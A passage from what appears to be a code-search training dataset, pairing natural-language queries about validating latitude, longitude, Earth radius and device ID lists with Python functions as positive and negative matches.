"def invalidLatitude(latitude):\n\ttry:\n\t\tlatitude = float(latitude)\n\texcept ValueError:\n\t\treturn True\n\n\tif (-90 <= latitude <= 90):\n\t\treturn False\n\telse:\n\t\treturn True",
"def validate_lat_in_range(value):\n\t_validate_in_range(value, -90, 90)",
"def assert_is_lat(val):\n assert type(val) is float or type(val) is int, \"Value must be a number\"\n if val < -90.0 or val > 90.0:\n raise ValueError(\"Latitude value must be between -90 and 90\")",
"def check_latitude(self, ds):\n ret_val = []\n\n recommended = 'degrees_north'\n acceptable = ['degree_north', 'degree_N', 'degrees_N', 'degreeN', 'degreesN']\n \n for k,v in ds.dataset.variables.iteritems():\n if k == 'latitude' or getattr(v, 'standard_name', None) == 'latitude':\n results = self._coord_has_units(k, 'latitude', v, recommended, acceptable)\n ret_val.extend(results)\n\n\n return ret_val",
"def verifyLatLon(lat:float, lon:float) -> bool:\n return verifyLatitude(lat) and verifyLongitude(lon)",
"def test_validate_coordinates():\n lat_less_than = (-91.00, 1.0)\n lat_more_than = (91.00, 1.0)\n lon_less_than = (1.00, -181.0)\n lon_more_than = (1.00, 181.0)\n\n assert validate_coordinates(lat_less_than) == [lat_less_than, \"latitude less than -90\"]\n assert validate_coordinates(lat_more_than) == [lat_more_than, \"latitude greater than 90\"]\n assert validate_coordinates(lon_less_than) == [lon_less_than, \"longitude less than -180\"]\n assert validate_coordinates(lon_more_than) == [lon_more_than, \"longitude greater than 180\"]",
"def coordinate_length_ok(latitude, longitude):\n if len(str(latitude)) > 6 and len(str(longitude)) > 6:\n return True\n return False",
"def has_latitude(self):\n xpath = [\"StopPoints\", \"StopPoint\", \"Place\", \"Location\"]\n locations = self.find_anywhere(xpath)\n\n if len(locations) == 0:\n return False\n\n try:\n locations[0].get_elements(\"Latitude\")\n return True\n except NoElement:\n return False",
"def verifyLongitude(lon:float) -> bool:\n return (-180 <= lon <= 180)",
"def test_geographical_coordinates_with_valid_address(self):\n valid_address = \"576 Natoma St., San Francisco CA\"\n geo_coords = GeographicalCoordinates(valid_address)\n\n self.assertNotEqual(geo_coords.latitude, 0.0)\n self.assertNotEqual(geo_coords.longitude, 0.0)\n self.assertEqual(geo_coords.status, 'OK')",
"def is_valid_geocode(geocodigo):\n if len(str(geocodigo)) != 7:\n raise ValueError('Geocode must have 7 digtis')\n dig = int(str(geocodigo)[-1])\n if dig == calculate_digit(geocodigo):\n return True\n else:\n return False",
"def valid(self):\n if self.error == \"None\" and \\\n self.coord[0] > 0 and self.coord[1] > 0 and \\\n self.coord[0] < 1 and self.coord[1] < 1:\n return True\n else:\n return False",
"def check_longitude(lon):\n if lon < -180 or lon > 180:\n raise ValueError(\"Longitude (%f) out of range [-180, 180]\" % lon)",
"def validate_gps_string(gps_string, map_settings):\r\n gps_coords = gps_string.split(\",\")\r\n if len(gps_coords) == 2:\r\n lat = gps_coords[0]\r\n long = gps_coords[1]\r\n try:\r\n lat_float = float(lat)\r\n long_float = float(long)\r\n except ValueError:\r\n return \"\"\r\n if ((lat >= map_settings['latitude-valid-limits'][1] or lat <= map_settings['latitude-valid-limits'][0]) and # E.g. \"55.50\", \"51.40\"\r\n (long >= map_settings['longitude-valid-limits'][0] or long <= map_settings['longitude-valid-limits'][1])): # E.g. \"-10.70\", \"-5.40\"\r\n return gps_string\r\n return \"\"",
"def isValidCoord(passed_coord):\n coordRegex = re.compile(r'(-)?\\b(\\d?)(\\d?)(\\d?)\\b(\\.|,)\\b(\\d?)(\\d?)(\\d?)(\\d?)(\\d?)\\b(, |; )(-)?\\b(\\d?)(\\d?)(\\d?)\\b(\\.|,)\\b(\\d?)(\\d?)(\\d?)(\\d?)(\\d?)\\b')\n coordTest = coordRegex.search(passed_coord)\n if coordTest is None:\n print(\"You did not enter a proper coordinate. \")\n return False\n else:\n if passed_coord == coordTest.group():\n print(\"You entered a proper coord. \")\n return True\n else:\n print(\"You did not enter a proper coord. \")\n return False",
"def ST_IsValid(geos):\n return arctern.ST_IsValid(geos)",
"def is_valid_point(map_grid, point):\n x = point[0]\n y = point[1]\n width = map_grid.info.width\n height = map_grid.info.height\n return 0 <= x < width and 0 <= y < height",
"def test_single_point_lat_long(self):\n\n data = np.ones((16, 16), dtype=np.float32)\n data[7, 7] = 0\n cube = set_up_variable_cube(data, spatial_grid=\"latlon\",)\n\n msg = \"Unable to convert from\"\n radius = 6000.0\n with self.assertRaisesRegex(ValueError, msg):\n GeneratePercentilesFromANeighbourhood(radius).process(cube)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Check if longitude is valid
|
def verifyLongitude(lon:float) -> bool:
return (-180 <= lon <= 180)
|
[
"def check_longitude(lon):\n if lon < -180 or lon > 180:\n raise ValueError(\"Longitude (%f) out of range [-180, 180]\" % lon)",
"def check_longitude(self, ds):\n ret_val = []\n\n recommended = 'degrees_east'\n acceptable = ['degree_east', 'degree_E', 'degrees_E', 'degreeE', 'degreesE']\n \n for k,v in ds.dataset.variables.iteritems():\n if k == 'longitude' or getattr(v, 'standard_name', None) == 'longitude':\n results = self._coord_has_units(k, 'longitude', v, recommended, acceptable)\n ret_val.extend(results)\n\n\n return ret_val",
"def verifyLatLon(lat:float, lon:float) -> bool:\n return verifyLatitude(lat) and verifyLongitude(lon)",
"def assert_is_lon(val):\n assert type(val) is float or type(val) is int, \"Value must be a number\"\n if val < -180.0 or val > 180.0:\n raise ValueError(\"Longitude value must be between -180 and 180\")",
"def coordinate_length_ok(latitude, longitude):\n if len(str(latitude)) > 6 and len(str(longitude)) > 6:\n return True\n return False",
"def test_bad_longitude(self):\n self.assertRaises(ValidationError, create_area, latitude=Decimal(value=\"1\"), longitude=Decimal(value=\"181\"),\n radius=5, fid=self.fid)",
"def validate_lat_in_range(value):\n\t_validate_in_range(value, -90, 90)",
"def test_validate_coordinates():\n lat_less_than = (-91.00, 1.0)\n lat_more_than = (91.00, 1.0)\n lon_less_than = (1.00, -181.0)\n lon_more_than = (1.00, 181.0)\n\n assert validate_coordinates(lat_less_than) == [lat_less_than, \"latitude less than -90\"]\n assert validate_coordinates(lat_more_than) == [lat_more_than, \"latitude greater than 90\"]\n assert validate_coordinates(lon_less_than) == [lon_less_than, \"longitude less than -180\"]\n assert validate_coordinates(lon_more_than) == [lon_more_than, \"longitude greater than 180\"]",
"def validate_lng_in_range(value):\n\t_validate_in_range(value, -180, 180)",
"def verifyLatitude(lat:float) -> bool:\n return (-90 <= lat <= 90)",
"def test_lon(result):\n\n assert -180 <= result.json()['lon'] <= 180, \\\n \"Value of the 'lon' field is not in a given range.\"",
"def locn_is_latlong():\n s = read_command(\"g.region\", flags='pu')\n kv = parse_key_val(s, ':')\n if kv['projection'].split(' ')[0] == '3':\n return True\n else:\n return False",
"def _check_area(self):\n (lat_max, lon_min, lat_min, lon_max) = self.area\n if not (\n -90 <= lat_max <= 90\n and -90 <= lat_min <= 90\n and -180 <= lon_min <= 180\n and -180 <= lon_max <= 180\n and lat_max > lat_min\n and lon_max != lon_min\n ):\n raise ValueError(\n \"Provide coordinates as lat_max lon_min lat_min lon_max. \"\n \"Latitude must be in range -180,+180 and \"\n \"longitude must be in range -90,+90.\"\n )",
"def test_invalid_longitude(self):\n self.assertRaises(\n ValueError,\n self.wda.append_weather_data,\n 21.0068,\n -190.64,\n date(2012, 1, 6))",
"def test_geographical_coordinates_with_valid_address(self):\n valid_address = \"576 Natoma St., San Francisco CA\"\n geo_coords = GeographicalCoordinates(valid_address)\n\n self.assertNotEqual(geo_coords.latitude, 0.0)\n self.assertNotEqual(geo_coords.longitude, 0.0)\n self.assertEqual(geo_coords.status, 'OK')",
"def validate_gps_string(gps_string, map_settings):\r\n gps_coords = gps_string.split(\",\")\r\n if len(gps_coords) == 2:\r\n lat = gps_coords[0]\r\n long = gps_coords[1]\r\n try:\r\n lat_float = float(lat)\r\n long_float = float(long)\r\n except ValueError:\r\n return \"\"\r\n if ((lat >= map_settings['latitude-valid-limits'][1] or lat <= map_settings['latitude-valid-limits'][0]) and # E.g. \"55.50\", \"51.40\"\r\n (long >= map_settings['longitude-valid-limits'][0] or long <= map_settings['longitude-valid-limits'][1])): # E.g. \"-10.70\", \"-5.40\"\r\n return gps_string\r\n return \"\"",
"def check_latitude(lat):\n if lat < -90 or lat > 90:\n raise ValueError(\"Latitude (%f) out of range [-90 - 90]\" % lat)",
"def verify_location(coordinates):\n\n coordinates.columns = coordinates.columns.str.lower()\n\n # Verify that all air quality locations are (roughly) within Oregon\n for ind in coordinates.index:\n\n lat = coordinates.at[ind, 'latitude']\n long = coordinates.at[ind, 'longitude']\n\n if (40 <= lat <= 47) and (-125 <= long <= -115):\n pass\n else:\n warnings.warn(f\"Coordinate not in Oregon at index: {ind}\")",
"def invalidLatitude(latitude):\n\ttry:\n\t\tlatitude = float(latitude)\n\texcept ValueError:\n\t\treturn True\n\n\tif (-90 <= latitude <= 90):\n\t\treturn False\n\telse:\n\t\treturn True"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Check if lat/lon are valid
|
def verifyLatLon(lat:float, lon:float) -> bool:
return verifyLatitude(lat) and verifyLongitude(lon)
|
[
"def test_validate_coordinates():\n lat_less_than = (-91.00, 1.0)\n lat_more_than = (91.00, 1.0)\n lon_less_than = (1.00, -181.0)\n lon_more_than = (1.00, 181.0)\n\n assert validate_coordinates(lat_less_than) == [lat_less_than, \"latitude less than -90\"]\n assert validate_coordinates(lat_more_than) == [lat_more_than, \"latitude greater than 90\"]\n assert validate_coordinates(lon_less_than) == [lon_less_than, \"longitude less than -180\"]\n assert validate_coordinates(lon_more_than) == [lon_more_than, \"longitude greater than 180\"]",
"def valid(self):\n if self.error == \"None\" and \\\n self.coord[0] > 0 and self.coord[1] > 0 and \\\n self.coord[0] < 1 and self.coord[1] < 1:\n return True\n else:\n return False",
"def _check_area(self):\n (lat_max, lon_min, lat_min, lon_max) = self.area\n if not (\n -90 <= lat_max <= 90\n and -90 <= lat_min <= 90\n and -180 <= lon_min <= 180\n and -180 <= lon_max <= 180\n and lat_max > lat_min\n and lon_max != lon_min\n ):\n raise ValueError(\n \"Provide coordinates as lat_max lon_min lat_min lon_max. \"\n \"Latitude must be in range -180,+180 and \"\n \"longitude must be in range -90,+90.\"\n )",
"def verifyLatitude(lat:float) -> bool:\n return (-90 <= lat <= 90)",
"def check_valid_coords(xy, allow: bool, warn: bool) -> None:\n if np.isnan(xy).any() or np.isinf(xy).any():\n if not allow:\n raise ValueError(\"invalid coordinates\", xy)\n elif warn:\n warnings.warn(f\"invalid coordinates: {xy}\")",
"def is_valid_point(map_grid, point):\n x = point[0]\n y = point[1]\n width = map_grid.info.width\n height = map_grid.info.height\n return 0 <= x < width and 0 <= y < height",
"def coordinate_length_ok(latitude, longitude):\n if len(str(latitude)) > 6 and len(str(longitude)) > 6:\n return True\n return False",
"def test_get_coords_list_valid(self):\n coupon = COUPON_FACTORY.create_coupon()\n coords_list = coupon.get_location_coords_list()\n self.assertAlmostEqual(int(float(coords_list[0][0])), -73)\n self.assertAlmostEqual(int(float(coords_list[0][1])), 41)",
"def test_geographical_coordinates_with_valid_address(self):\n valid_address = \"576 Natoma St., San Francisco CA\"\n geo_coords = GeographicalCoordinates(valid_address)\n\n self.assertNotEqual(geo_coords.latitude, 0.0)\n self.assertNotEqual(geo_coords.longitude, 0.0)\n self.assertEqual(geo_coords.status, 'OK')",
"def coordinate_checker(self, a, b):\n self.assertAlmostEqual(a[\"lat\"], b[\"lat\"], 3)\n self.assertAlmostEqual(a[\"lng\"], b[\"lng\"], 3)",
"def verify_location(coordinates):\n\n coordinates.columns = coordinates.columns.str.lower()\n\n # Verify that all air quality locations are (roughly) within Oregon\n for ind in coordinates.index:\n\n lat = coordinates.at[ind, 'latitude']\n long = coordinates.at[ind, 'longitude']\n\n if (40 <= lat <= 47) and (-125 <= long <= -115):\n pass\n else:\n warnings.warn(f\"Coordinate not in Oregon at index: {ind}\")",
"def verifyLongitude(lon:float) -> bool:\n return (-180 <= lon <= 180)",
"def check_longitude(lon):\n if lon < -180 or lon > 180:\n raise ValueError(\"Longitude (%f) out of range [-180, 180]\" % lon)",
"def check_latitude(lat):\n if lat < -90 or lat > 90:\n raise ValueError(\"Latitude (%f) out of range [-90 - 90]\" % lat)",
"def validate_lat_in_range(value):\n\t_validate_in_range(value, -90, 90)",
"def ST_IsValid(geos):\n return arctern.ST_IsValid(geos)",
"def test_single_point_lat_long(self):\n\n data = np.ones((16, 16), dtype=np.float32)\n data[7, 7] = 0\n cube = set_up_variable_cube(data, spatial_grid=\"latlon\",)\n\n msg = \"Unable to convert from\"\n radius = 6000.0\n with self.assertRaisesRegex(ValueError, msg):\n GeneratePercentilesFromANeighbourhood(radius).process(cube)",
"def isValidCoord(passed_coord):\n coordRegex = re.compile(r'(-)?\\b(\\d?)(\\d?)(\\d?)\\b(\\.|,)\\b(\\d?)(\\d?)(\\d?)(\\d?)(\\d?)\\b(, |; )(-)?\\b(\\d?)(\\d?)(\\d?)\\b(\\.|,)\\b(\\d?)(\\d?)(\\d?)(\\d?)(\\d?)\\b')\n coordTest = coordRegex.search(passed_coord)\n if coordTest is None:\n print(\"You did not enter a proper coordinate. \")\n return False\n else:\n if passed_coord == coordTest.group():\n print(\"You entered a proper coord. \")\n return True\n else:\n print(\"You did not enter a proper coord. \")\n return False",
"def isCoordValid(coordinate):\n return coordinate in allCoords"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Check if valid radius for Earth in kilometers
|
def verifyRadius(radius:float) -> bool:
return (0 < radius < 6371)
|
[
"def check_range(lat_user, lon_user, lat_test, lon_test, radius):\n distance = haversine(lon_user,lat_user, lon_test, lat_test)\n if distance <= radius:\n return True\n else:\n return False",
"def checkWithinRITRadius(latitude,longitude):\n radius_to_check=2 #2 miles radius\n RIT_center=(-77.679955,43.08611833333333)\n if geopy.distance.distance((RIT_center),(latitude,longitude)).miles<=radius_to_check:\n return True\n else:\n return False",
"def test_stations_within_radius(): # Add test for stations_within_radius function\n stations = build_station_list() # Create list of stations for testing\n centre = (53, -1) # Put the centre (roughly) in the middle of the UK\n # (according to the data from DEFRA, the extent of the stations is between\n # Lat 49.9-55.8 and Long -6.2 - 2.1)\n r = 1500 # Set a large radius to guarantee encompassing all of the stations\n output = stations_within_radius(stations, centre, r) # Use the test function\n\n if len(stations) == 0: # Ensure that there is some data to be tested\n # from the source\n raise ValueError(\"Source list gives no data\")\n else:\n assert len(output) > 0 # Ensure that it outputs some data\n assert type(output[0]) == MonitoringStation # Ensure that it is outputting a list of names\n # in MonitoringStation format\n assert len(output) == len(stations) # Make sure that it includes all of the stations\n # (as r and centre are set so that it should encompass all of the stations)",
"def test_get_radius_from_request(self):\n test_query_dict = {'location': 'West Hollywood, CA, United States', 'open': 'true', 'radius': '10'}\n radius = get_radius_from_request(test_query_dict)\n assert radius == 10*1609.344, \"radius is actually {}\".format(radius)\n del test_query_dict['radius']\n radius = get_radius_from_request(test_query_dict)\n assert radius == 8000, \"radius is actually {}\".format(radius)",
"def check_ellipsoid(pt, abc):\n\n\treturn np.sum(np.square(pt) / np.square(abc)) < 1",
"def test_radius_cap(self):\n test_query_dict = {'location': 'West Hollywood, CA, United States', 'open': 'true', 'radius': '50'}\n radius = get_radius_from_request(test_query_dict)\n assert radius == 50000, \"radius is actually {}\".format(radius)\n del test_query_dict['radius']\n radius = get_radius_from_request(test_query_dict)\n assert radius == 8000, \"radius is actually {}\".format(radius)",
"def distance_to_earth(self):\n if self.distance_module is not None:\n return 10 ** ((self.distance_module + 5) / 5)\n elif self.parallax is not None:\n return 1/self.parallax\n else:\n raise ValueError(\"There is no way to find out the distance to earth for this location.\")",
"def coordinate_length_ok(latitude, longitude):\n if len(str(latitude)) > 6 and len(str(longitude)) > 6:\n return True\n return False",
"def radius_east(self, lat):\n return self.a / sqrt(1. - self.e2 * sin(lat)**2)",
"def test_unused_locality_near_stops_150_meters():\n assert unused()",
"def test_radius(self):\n dictList = get_dict_list()\n postcodelatlng = [50.827974, -4.543799]\n radius = 0\n actualOutput = filterData(dictList, postcodelatlng, radius)\n expectedOutput = []\n self.assertEqual(actualOutput, expectedOutput)",
"def in_circle(radius):\n return lambda z: z.real ** 2 + z.imag ** 2 < radius ** 2",
"def ellipsoidcurvradius(ellipsoid, lat_gd, azimuth):\n errtext = 'Invalid excentricity value in ellipsoid model.'\n inrange(ellipsoid[1], 0, 1, exclude='upper', text=errtext)\n\n aterm = 1 - ellipsoid[1]**2 * sind(lat_gd)**2\n rn = 1 / np.sqrt(aterm)\n rm = (1 - ellipsoid[1]**2) * (rn / aterm)\n e0 = (ellipsoid[0] / (cosd(azimuth)**2.0 / rm + sind(azimuth)**2.0 / rn))\n e1 = 0\n\n return e0, e1",
"def verifyLatitude(lat:float) -> bool:\n return (-90 <= lat <= 90)",
"def test_single_point_lat_long(self):\n\n data = np.ones((16, 16), dtype=np.float32)\n data[7, 7] = 0\n cube = set_up_variable_cube(data, spatial_grid=\"latlon\",)\n\n msg = \"Unable to convert from\"\n radius = 6000.0\n with self.assertRaisesRegex(ValueError, msg):\n GeneratePercentilesFromANeighbourhood(radius).process(cube)",
"def check_radius(func):\n def inner_function(rad):\n if rad <=0:\n raise ValueError('Radius cannot be negative')\n return func(rad)\n return inner_function",
"def is_tweet_in_latlong_radius(tweet_json:str, latlong, radius:float):\r\n\ttweet_dict = json.loads(tweet_json)\r\n\ttweet_coords = None\r\n\t\r\n\t#Check whether coordinates are available or whether a valid place is available to approximate coordinates from\r\n\tcoordinates_available = 'coordinates' in tweet_dict and tweet_dict['coordinates'] is not None\r\n\tplace_available = ('place' in tweet_dict and tweet_dict['place'] is not None\r\n\t\t\t and 'bounding_box' in tweet_dict['place']\r\n\t\t\t and tweet_dict['place']['bounding_box'] is not None\r\n\t\t\t and 'coordinates' in tweet_dict['place']['bounding_box']\r\n\t\t\t and tweet_dict['place']['bounding_box']['coordinates'] is not None)\r\n\t\r\n\t#If coordinates are available in some form, use them as the tweet coordinates\r\n\tif coordinates_available:\r\n\t\ttweet_coords = tweet_dict['coordinates']['coordinates']\r\n\telif place_available:\r\n\t\ttweet_bounding_box = tweet_dict['place']['bounding_box']['coordinates'][0]\r\n\t\ttweet_bb_centroid_longitude = sum(coord[0] for coord in tweet_bounding_box)/len(tweet_bounding_box)\r\n\t\ttweet_bb_centroid_latitude = sum(coord[1] for coord in tweet_bounding_box)/len(tweet_bounding_box)\r\n\t\ttweet_coords = [tweet_bb_centroid_longitude, tweet_bb_centroid_latitude]\r\n\tif tweet_coords is None:\r\n\t\tsys.stderr.write(f\"Tweet coords is none. Ignoring offending tweet: {tweet_json}\")\r\n\t\treturn False\r\n\t\r\n\t#longitude is currently first due to how Twitter orders coordinates; we flip this now\r\n\ttweet_coords = list(reversed(tweet_coords))\r\n\ttweet_distance = distance(tweet_coords, latlong)\r\n\treturn tweet_distance.miles <= radius",
"def sphereRadius(self,model=0):\n cm = self.centerOfMass(model) \n radius = 0.0\n for a in self.atoms.values():\n if a.inModel(model):\n dist_vector = (a.coordinates - cm).A.ravel()\n distance = sqrt(dot(dist_vector,dist_vector))\n print distance\n if distance > radius:\n radius = distance\n return (cm, radius)",
"def _check_area(self):\n (lat_max, lon_min, lat_min, lon_max) = self.area\n if not (\n -90 <= lat_max <= 90\n and -90 <= lat_min <= 90\n and -180 <= lon_min <= 180\n and -180 <= lon_max <= 180\n and lat_max > lat_min\n and lon_max != lon_min\n ):\n raise ValueError(\n \"Provide coordinates as lat_max lon_min lat_min lon_max. \"\n \"Latitude must be in range -180,+180 and \"\n \"longitude must be in range -90,+90.\"\n )"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Check list of devices (12char HEX strings) Require ALL devices to be valid. This is intentional instead of filtering out bad IDs because the user might not notice that some devices are incorrect.
|
def verifyDeviceList(devices:[str]) -> bool:
return all(map(verifyDeviceString, devices))
|
[
"def test_validate_list_true(self):\n subset_list = ['0064F', '0088E', '00890']\n self.assertTrue(\n self.utils.validate_list(self.data.device_list, subset_list))",
"def check_devices(self) -> bool:\n\t\tpass",
"def validate(self):\n\n bad = list()\n logger.debug('Loading database to validate contained devices ...')\n for doc in self.backend.all_items:\n # Try and load device based on database info\n _id = doc.get(self._id_key, \"(unknown id)\")\n try:\n logger.debug(\"Attempting to initialize %s...\", _id)\n item = self._get_item_from_document(doc)\n logger.debug(\"Attempting to validate ...\")\n self._validate_item(item)\n except Exception as e:\n logger.warning(\"Failed to validate %s because %s\", _id, e)\n bad.append(_id)\n else:\n logger.debug('Successfully validated %s', _id)\n return bad",
"def test_bluetoothctl_devices(self):\n\n output='Device EB:06:EF:62:13:19 TaoTronics TT-BH026\\n'\n output+='Device AC:1F:EA:F8:AA:A1 wacom'\n\n actual = parse(output, quiet=True)\n\n self.assertIsNotNone(actual)\n self.assertIsNotNone(actual[0])\n self.assertIsNotNone(actual[1])\n\n expected = [\n {\n \"address\": \"EB:06:EF:62:13:19\",\n \"name\": \"TaoTronics TT-BH026\"\n },\n {\n \"address\": \"AC:1F:EA:F8:AA:A1\",\n \"name\": \"wacom\"\n }\n ]\n\n if actual:\n for k, v in expected[0].items():\n self.assertEqual(v, actual[0][k], f\"Device regex failed on {k}\")\n\n for k, v in expected[1].items():\n self.assertEqual(v, actual[1][k], f\"Device regex failed on {k}\")",
"def check_hwids():\n compatibles = get_compatibles()\n hwids = []\n messages = []\n for compatible in compatibles:\n hwid = compatible.get('hwidmatch').strip('^.*-').split(' ')[0]\n if hwid not in hwids:\n hwids.append(hwid)\n\n for item in CHROMEOS_RECOVERY_ARM_HWIDS:\n if item not in hwids:\n messages.append('%s is not available, please remove it from inputstreamhelper config' % item)\n for item in hwids:\n if item not in CHROMEOS_RECOVERY_ARM_HWIDS:\n messages.append('%s is missing, please add it to inputstreamhelper config' % item)\n if messages:\n raise Exception(messages)\n\n smallest = get_smallest()\n hwid = smallest.get('hwidmatch').strip('^.*-').split(' ')[0]\n print('Chrome OS hardware id\\'s are up to date, current smallest recovery image is %s' % hwid)",
"def check_all_same_device(glist, name):\n if len(glist) == 0:\n return\n device = glist[0].device\n for i, g in enumerate(glist):\n if g.device != device:\n raise DGLError(\n \"Expect {}[{}] to be on device {}, but got {}.\".format(\n name, i, device, g.device\n )\n )",
"def parse_devices(input_devices):\n ret = []\n for d in input_devices.split(','):\n for regex, func in REGEX:\n m = regex.match(d.lower().strip())\n if m:\n tmp = func(m.groups())\n # prevent duplicate\n for x in tmp:\n if x not in ret:\n ret.append(x)\n break\n else:\n raise NotSupportedCliException(\n 'Can not recognize device: \"%s\"' % d)\n return ret",
"def check_udev_rules():\n ok = True\n udev_dir = Path(\"/etc/udev/rules.d/\")\n desired_rules = {\n 'dfu': {_udev_rule(\"03eb\", \"2ff4\"), _udev_rule(\"03eb\", \"2ffb\"), _udev_rule(\"03eb\", \"2ff0\")},\n 'input_club': {_udev_rule(\"1c11\", \"b007\")},\n 'stm32': {_udev_rule(\"1eaf\", \"0003\"), _udev_rule(\"0483\", \"df11\")},\n 'bootloadhid': {_udev_rule(\"16c0\", \"05df\")},\n 'caterina': {\n _udev_rule(\"2341\", \"0036\", 'ENV{ID_MM_DEVICE_IGNORE}=\"1\"'),\n _udev_rule(\"1b4f\", \"9205\", 'ENV{ID_MM_DEVICE_IGNORE}=\"1\"'),\n _udev_rule(\"1b4f\", \"9203\", 'ENV{ID_MM_DEVICE_IGNORE}=\"1\"'),\n _udev_rule(\"2a03\", \"0036\", 'ENV{ID_MM_DEVICE_IGNORE}=\"1\"')\n }\n }\n\n # These rules are no longer recommended, only use them to check for their presence.\n deprecated_rules = {\n 'dfu': {_deprecated_udev_rule(\"03eb\", \"2ff4\"), _deprecated_udev_rule(\"03eb\", \"2ffb\"), _deprecated_udev_rule(\"03eb\", \"2ff0\")},\n 'input_club': {_deprecated_udev_rule(\"1c11\")},\n 'stm32': {_deprecated_udev_rule(\"1eaf\", \"0003\"), _deprecated_udev_rule(\"0483\", \"df11\")},\n 'bootloadhid': {_deprecated_udev_rule(\"16c0\", \"05df\")},\n 'caterina': {'ATTRS{idVendor}==\"2a03\", ENV{ID_MM_DEVICE_IGNORE}=\"1\"', 'ATTRS{idVendor}==\"2341\", ENV{ID_MM_DEVICE_IGNORE}=\"1\"'}\n }\n\n if udev_dir.exists():\n udev_rules = [rule_file for rule_file in udev_dir.glob('*.rules')]\n current_rules = set()\n\n # Collect all rules from the config files\n for rule_file in udev_rules:\n for line in rule_file.read_text().split('\\n'):\n line = line.strip()\n if not line.startswith(\"#\") and len(line):\n current_rules.add(line)\n\n # Check if the desired rules are among the currently present rules\n for bootloader, rules in desired_rules.items():\n # For caterina, check if ModemManager is running\n if bootloader == \"caterina\":\n if check_modem_manager():\n ok = False\n cli.log.warn(\"{bg_yellow}Detected ModemManager without the necessary udev rules. Please either disable it or set the appropriate udev rules if you are using a Pro Micro.\")\n if not rules.issubset(current_rules):\n deprecated_rule = deprecated_rules.get(bootloader)\n if deprecated_rule and deprecated_rule.issubset(current_rules):\n cli.log.warn(\"{bg_yellow}Found old, deprecated udev rules for '%s' boards. The new rules on https://docs.qmk.fm/#/faq_build?id=linux-udev-rules offer better security with the same functionality.\", bootloader)\n else:\n cli.log.warn(\"{bg_yellow}Missing udev rules for '%s' boards. You'll need to use `sudo` in order to flash them.\", bootloader)\n\n return ok",
"def valid_device_indexes():\n return tuple(AudioInputSource.input_devices().keys())",
"def load_dev_ids():\n for dev_id in os.environ['DEV_IDS'].split(','):\n try:\n dev_ids.append(int(dev_id))\n except ValueError:\n print(f\"Skipped invalid ID: '{dev_id}'\")",
"def get_device_ids(self) -> Set[str]:\n stdout = self.run_cli_command(\"-d\")[0]\n \n return set([id.strip() for id in stdout.split(\"\\n\") if id.strip() != ''])",
"def _is_valid_device(device):\n return not os.system(\"hciconfig list 2>/dev/null | grep -q ^%s:\" % device)",
"def test_device_id_list_handler_too_many_simultaneous_registrations(self):\n headers = dict(self.auth)\n headers['Content-Type'] = self.controller.DEVICE_ID_LIST_MEDIA_TYPE\n with self.request_context_with_library(\n \"/\", method='POST', headers=headers, data=\"device1\\ndevice2\"\n ):\n self.controller.authenticated_patron_from_request()\n response = self.controller.device_id_list_handler()\n eq_(413, response.status_code)\n eq_(\"You may only register one device ID at a time.\", response.detail)",
"def devices(self):\n command = [self.gracebat, '-v']\n output = check_output(command, stderr=subprocess.STDOUT)\n found_devices = False\n for line in output.split(\"\\n\"):\n if found_devices:\n return line.split()\n if line.startswith(\"Registered devices:\"):\n # the next line will be the device list\n found_devices = True",
"def scan_devices(): # {\n logger.info(\"IN scan_devices\")\n\n devices_dict = thePlayer.scan_devices()\n devices_list = [\"%s,%s\" % (k, cc.name) for k, cc in devices_dict.items()]\n try:\n devices = \"\\n\".join(devices_list)\n except TypeError:\n devices = \"\\n\".join([\"??\"]*7)\n bdevices = devices.encode()\n self.send_header(\"Content-Length\", str(len(bdevices)))\n self.end_headers()\n self.wfile.write(bdevices)\n self.wfile.flush()",
"def check_list_ids(ids):\n logger = logging.getLogger('TaxaDB')\n if len(ids) > TaxaDB.MAX_LIST:\n logger.error(\n \"Too many accession entries to request (%d), max %d\"\n % (len(ids), TaxaDB.MAX_LIST))\n sys.exit(1)\n return True",
"def _valid_cdr3(cdr3):\n amino_acids = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y']\n valid = np.all([aa in amino_acids for aa in cdr3])\n return valid",
"def check_bad_chars(seq, amino_acids):\n bad_characters = []\n for character in seq:\n if character not in amino_acids.keys():\n bad_characters = bad_characters + [character]\n\n return bad_characters",
"def device_ids(self, value):\n\t\tvendor_id, product_id = tuple(value.split(\":\")[-2:])\n\t\tcosmetic_id = \"device-%s-%s\" % (vendor_id, product_id)\n\t\treturn (vendor_id, product_id, cosmetic_id)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Parse both radius and center arguments. If neither is specified return None. If only one is specified return error. If both are specified return the pair as a tuple
|
def argParseRadiusArgs(r:float, c:str):
try:
x = (argParseRadius(r), argParseCenter(c))
if all(x):
return x
elif not any(x):
return None
else:
raise ArgumentError("Arguments 'radius' and 'center' must both be specified. Argument 'radius' must be a float between 0 and 6371 (kilometers) and argument 'center' must be a valid pair of latitude,longitude coordinates, such as 'center=88.1,-110.2242", status_code=400)
except ArgumentError:
raise
|
[
"def find_center_oval(x1, y1, x2, y2) -> tuple:\r\n return int((x1 + x2)/2), int((y1+y2)/2)",
"def circle_from_points(p1, p2, p3):\n\n # center is intersection of bisectors of segments p1-p2 and p2-p3\n\n s = np.real((p3-p1)*np.conj(p3-p2)) / np.imag((p3-p1)*np.conj(p3-p2))\n center = (p1+p2)/2 + np.complex(0, s)*(p1-p2)/2\n radius = abs(p1-center)\n\n return center, radius",
"def extract_circle(center, radius, coords):\n return np.where(((coords - center) ** 2).sum(axis=-1) < radius**2)[0]",
"def define_circle_points(center, radius):\n res = np.pi/radius # set resolution to avoid double counting a pixel\n x = center[0] + np.round(radius * np.cos(np.arange(-np.pi, np.pi, res)))\n y = center[1] + np.round(radius * np.sin(np.arange(-np.pi, np.pi, res)))\n return x, y",
